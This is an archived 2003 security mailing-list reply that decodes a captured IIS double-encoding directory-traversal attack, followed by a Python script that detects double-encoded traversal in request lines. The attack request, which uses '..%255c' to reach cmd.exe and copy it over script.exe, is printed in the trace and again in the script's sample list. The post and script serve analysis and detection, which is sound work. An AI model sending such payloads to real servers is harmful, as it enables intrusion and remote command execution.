-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

If you put the dump into Ethereal and trace the TCP stream you can see what's going on a bit better. The top 3 lines are the request and the following ones are the reply. (I would color code it like Ethereal does but this MTA doesn't seem to support it. :-P ). Anyway... here is the decoded stream for those interested.

It looks like this is an attack on the Unicode bug. cmd.exe is being asked to copy cmd.exe over top of script.exe. The google URL probably appears because HTTP/1.1 GET requests MUST have a host name specified either in the GET line or using the Host field (as shown below).

Ok, enough of me, here is the trace:

GET /scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+copy+c:\winnt\system32\cmd.exe+c:\inetpub\scripts\script.exe HTTP/1.1
Host: www.google.com
Connection: keep-alive

HTTP/1.1 404 Not Found
Date: Sun, 13 Jul 2003 05:07:00 GMT
Server: Apache/1.3.27 (Unix)
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html; charset=iso-8859-1

137
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD>
<TITLE>404 Not Found</TITLE>
</HEAD><BODY>
<H1>Not Found</H1>
The requested URL /scripts/..%5c..%5cwinnt/system32/cmd.exe was not found on this server.<P>
<HR>
<ADDRESS>Apache/1.3.27 Server at dimension.lannet.com Port 80</ADDRESS>
</BODY></HTML>

0

Sam

On Monday 14 July 2003 13:35, sgt_b wrote:
> I've included a link to a tcpdump taken that shows a standard IIS
> directory-traversal attack. I was looking over the packets and noticed a
> reference to www.google.com. Could someone take a look, and let me know
> what this is being used for?
>
> http://12.208.102.165/attack3.dump
> attack3.dump=1.6kb
>
> Thanks!
>
> ----------------------------------------------------------------------------
> Attend the Black Hat Briefings & Training, July 28 - 31 in Las Vegas, the
> world's premier technical IT security event! 10 tracks, 15 training
> sessions, 1,800 delegates from 30 nations including all of the top experts,
> from CSO's to "underground" security specialists. See for yourself what
> the buzz is about! Early-bird registration ends July 3. This event will
> sell out. www.blackhat.com
> ----------------------------------------------------------------------------

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.2 (GNU/Linux)

iD8DBQE/E+bEuabcSIn58XwRArH5AJ4nNK288Y+3gDW02BzPewOt/iWr0ACcDmk5
gHKbLLSPY24OoX0jEd5IOrk=
=SHAM
-----END PGP SIGNATURE-----
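The point of Sam's decode is that %255c is a backslash hidden behind two layers of percent-encoding: the server's first decode turns it into %5c (exactly what the Apache 404 body echoes back), and only a second decode yields the "\" that makes "..\..\" climb out of /scripts/. A log-side check therefore has to decode until the string stops changing before it looks for traversal. The Python below is an added example written for this archive, not code from the post or from Ethereal; the request line it feeds in is the one from the trace above, the other sample lines are constructed, and the function names are my own.

```python
"""Detect double-encoded directory traversal in HTTP request lines.

Added example (not from the mailing-list post).  It decodes repeatedly,
normalises backslashes to forward slashes, then walks the path segments to
see whether ".." ever climbs above the web root.
"""
from urllib.parse import unquote

MAX_DECODE_ROUNDS = 4  # legitimate URLs never need more than one pass


def fully_decode(s):
    """Percent-decode until the value is stable.

    Returns (decoded_string, rounds_applied); rounds >= 2 means the
    request relied on the server decoding twice, as %255c does.
    """
    rounds = 0
    while rounds < MAX_DECODE_ROUNDS:
        decoded = unquote(s)
        if decoded == s:
            break
        s = decoded
        rounds += 1
    return s, rounds


def escapes_root(path):
    """True if '..' segments move above the root at any point in the walk."""
    depth = 0
    for seg in path.replace("\\", "/").split("/"):
        if seg == "..":
            depth -= 1
            if depth < 0:
                return True
        elif seg and seg != ".":
            depth += 1
    return False


def analyse_request_line(line):
    """Parse 'METHOD target HTTP/x.y' and report traversal indicators."""
    method, target, _version = line.split(" ", 2)  # ValueError if malformed
    raw_path = target.split("?", 1)[0]             # ignore the query string
    decoded_path, rounds = fully_decode(raw_path)
    return {
        "method": method,
        "decoded_path": decoded_path,
        "decode_rounds": rounds,
        "double_encoded": rounds >= 2,
        "traversal": escapes_root(decoded_path),
    }


def scan(lines):
    """Return (line, finding) pairs for request lines worth a second look."""
    findings = []
    for line in lines:
        try:
            r = analyse_request_line(line)
        except ValueError:
            findings.append((line, "malformed request line"))
            continue
        if r["traversal"]:
            tag = "double-encoded traversal" if r["double_encoded"] else "traversal"
            findings.append((line, tag + " -> " + r["decoded_path"]))
    return findings


# Constructed sample: the request from the trace plus benign and single-encoded lines.
SAMPLE_LINES = [
    "GET /scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+copy+c:\\winnt\\system32\\cmd.exe+c:\\inetpub\\scripts\\script.exe HTTP/1.1",
    "GET /index.html HTTP/1.1",
    "GET /images/../style.css HTTP/1.0",           # '..' that stays inside the root
    "GET /scripts/..%5c..%5cwinnt/system32/cmd.exe HTTP/1.0",  # single-encoded variant
]

if __name__ == "__main__":
    for line, finding in scan(SAMPLE_LINES):
        print(finding)
        print("   ", line)
```

Running the script flags the first and last sample lines only: the first after two decode rounds, the last after one. Stopping at MAX_DECODE_ROUNDS matters because a request can be encoded as deeply as the attacker likes, and the loop should never spin on input the server would not have decoded anyway.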
This archive was generated by hypermail 2b30 : Tue Jul 15 2003 - 11:01:15 PDT